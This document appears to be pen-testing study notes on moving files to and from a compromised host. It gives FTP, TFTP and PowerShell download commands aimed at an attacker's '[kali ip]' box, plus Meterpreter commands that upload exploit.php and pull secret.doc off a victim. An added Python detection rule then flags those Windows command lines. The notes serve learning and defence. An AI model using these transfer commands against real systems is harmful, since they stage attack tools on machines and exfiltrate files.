November 6, 2019 · Basic Pen-Testing
10.6 : Web app exploitation - File transfers
Common File Transfer Methods
HTTP
- Use nginx/apache for the service
FTP
- Set up an FTP server with python-pyftpdlib (the Python module itself is named pyftpdlib)
    cd /var/yourdir
    python -m pyftpdlib -p 21
- Windows or Linux both acceptable
    rem Comments sit on their own lines: a trailing "# ..." after echo would be written into ftp.txt by cmd
    echo open [kali ip] 21> ftp.txt
    rem username
    echo USER anonymous>> ftp.txt
    rem password
    echo pass>> ftp.txt
    rem binary mode
    echo bin>> ftp.txt
    echo GET [file]>> ftp.txt
    echo bye>> ftp.txt
    ftp -v -n -s:ftp.txt
TFTP
- Windows XP, 2003
- On Windows 7 or later, it needs to be installed manually.
- Attack side
    mkdir /tftp
    atftpd --daemon --port 69 /tftp
- Victim
    tftp -i $SrcIP get $filePath
Linux
- wget
- curl
- ftp
Windows
- ftp
- powershell
    echo $storageDir = $pwd >wget.ps1
    echo $webclient = New-Object System.Net.WebClient >>wget.ps1
    echo $url = "http://[kali ip]/[file]" >>wget.ps1
    echo $file = "[file]" >>wget.ps1
    echo $webclient.DownloadFile($url,$file) >>wget.ps1
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
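The Windows-side transfers above leave recognisable process command lines (ftp with -s:, tftp -i ... get, PowerShell run with -ExecutionPolicy Bypass -File). The following Python example is added here and is not part of the original notes; it matches those command lines in process-creation events, and the rule names, event fields and sample events are constructed for illustration.

```python
import re

# Hypothetical rule names; patterns are keyed to the Windows commands in these
# notes and are matched against command lines from process-creation logging.
RULES = {
    "ftp_script_mode": re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I),
    "tftp_get": re.compile(r"\btftp(\.exe)?\b.*\s-i\s+\S+\s+get\s+\S+", re.I),
    "ps_policy_bypass_file": re.compile(
        r"\bpowershell(\.exe)?\b(?=.*-ExecutionPolicy\s+Bypass)(?=.*-File\s+\S+\.ps1)",
        re.I),
    # echo is a cmd built-in, so this only fires when each echo is spawned as
    # its own "cmd.exe /c ..." process (or when shell input itself is logged).
    "echo_builds_webclient": re.compile(
        r"\becho\b.*(New-Object\s+System\.Net\.WebClient|\.DownloadFile\()"
        r".*>>?\s*\S+\.ps1", re.I),
}

def classify(cmdline):
    """Return the sorted names of all rules matching one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(events):
    """Return (host, rule names, command line) for every event with a hit."""
    hits = []
    for ev in events:
        names = classify(ev["cmdline"])
        if names:
            hits.append((ev["host"], names, ev["cmdline"]))
    return hits

# Constructed sample events (host names and addresses are placeholders).
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": "ftp -v -n -s:ftp.txt"},
    {"host": "ws01", "cmdline": "tftp -i 192.0.2.10 get tool.bin"},
    {"host": "ws02", "cmdline": "powershell.exe -ExecutionPolicy Bypass -NoLogo "
                                "-NonInteractive -NoProfile -File wget.ps1"},
    {"host": "ws02", "cmdline": "cmd.exe /c echo $webclient = New-Object "
                                "System.Net.WebClient >>wget.ps1"},
    {"host": "ws03", "cmdline": "ftp.exe files.example.com"},  # interactive, no script
    {"host": "ws03", "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for host, names, cmdline in scan(SAMPLE_EVENTS):
        print(f"{host}: {','.join(names)} <- {cmdline}")
```

PowerShell accepts abbreviated parameter names, so a production rule should match those forms as well as the full -ExecutionPolicy spelling used in these notes.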
Metasploit
- need to get shell on the machine first
- then use meterpreter via the sessions command
    upload /var/www/html/exploit.php c:\\Users\\IEUser\\exploit.php
    download c:\\Users\\IEUser\\secret.doc /var/www/html/secret.doc